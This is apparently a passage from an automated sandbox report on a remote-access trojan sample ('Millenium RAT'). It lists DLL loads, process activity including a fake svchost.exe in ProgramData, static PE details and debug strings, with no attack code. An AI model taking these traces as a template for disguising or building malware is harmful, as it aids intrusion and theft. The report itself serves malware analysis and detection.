Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\ProgramData\svchost.exe	Section loaded: version.dll
Source: C:\ProgramData\svchost.exe	Section loaded: vcruntime140.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\svchost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\svchost.exe	Section loaded: libffi-7.dll
Source: C:\ProgramData\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\svchost.exe	Section loaded: libcrypto-1_1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: libssl-1_1.dll
Source: C:\ProgramData\svchost.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\svchost.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\ProgramData\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\ProgramData\svchost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\svchost.exe	Section loaded: textshaping.dll
Source: C:\ProgramData\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\svchost.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\svchost.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\svchost.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\svchost.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: TS-240605-Millenium1.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: TS-240605-Millenium1.exe

Static file information: File size 38730377 > 1048576

Source: TS-240605-Millenium1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: TS-240605-Millenium1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: TS-240605-Millenium1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: TS-240605-Millenium1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: TS-240605-Millenium1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: TS-240605-Millenium1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: TS-240605-Millenium1.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: TS-240605-Millenium1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942062017.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942989444.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1923662951.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000016.00000003.1929815349.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1931767954.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927279052.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed source: main.exe, 00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1931767954.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1946788704.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: based.exe, 00000008.00000002.2129872037.00007FFDFAAD9000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1941897050.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: TS-240605-Millenium1.exe, 00000000.00000003.1829021959.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp, based.exe, 00000007.00000003.1867875346.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2142359047.00007FFE1A463000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1930503874.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1939751202.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1930503874.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1941061494.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942214372.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000008.00000002.2140810158.00007FFE13261000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000006.00000003.1866460732.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1907228986.00007FFE13311000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\attat\source\repos\Millenium RAT Buillder V2.8\Millenium\Millenium\obj\Release\net462\conhost.pdb source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2141209052.00007FFE13301000.00000040.00000001.01000000.0000001E.sdmp, svchost.exe, 00000016.00000003.1923356570.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927958538.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1934617102.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1934617102.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1926847028.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1947109622.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1929590309.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1934097832.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1939007934.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: svchost.exe, 00000016.00000003.1938211991.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942410950.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1939751202.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2140120247.00007FFE11EBC000.00000040.00000001.01000000.00000015.sdmp, svchost.exe, 00000016.00000003.1923662951.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927014509.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2139839021.00007FFE11511000.00000040.00000001.01000000.00000016.sdmp, svchost.exe, 00000016.00000003.1920172222.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927958538.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1935509292.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2139424502.00007FFE10301000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1929590309.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1946788704.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1941061494.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1947109622.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 00000005.00000000.1842954166.0000000000396000.00000002.00000001.01000000.00000007.sdmp, Build.exe, 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmp, s.exe, 0000000C.00000002.1929749777.0000000000D13000.00000002.00000001.01000000.00000014.sdmp, s.exe, 0000000C.00000000.1890528447.0000000000D13000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2134327409.00007FFDFBAC0000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 00000016.00000003.1963958439.000002C3F5832000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: based.exe, 00000008.00000002.2129872037.00007FFDFAB71000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: based.exe, 00000008.00000002.2137558702.00007FFE007E4000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000016.00000003.1938211991.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1934097832.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: svchost.exe, 00000016.00000003.1929815349.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1935509292.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927014509.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: TS-240605-Millenium1.exe, 00000000.00000003.1829021959.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp, based.exe, 00000007.00000003.1867875346.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2142359047.00007FFE1A463000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: based.exe, based.exe, 00000008.00000002.2129872037.00007FFDFAB71000.00000040.00000001.01000000.0000001C.sdmp
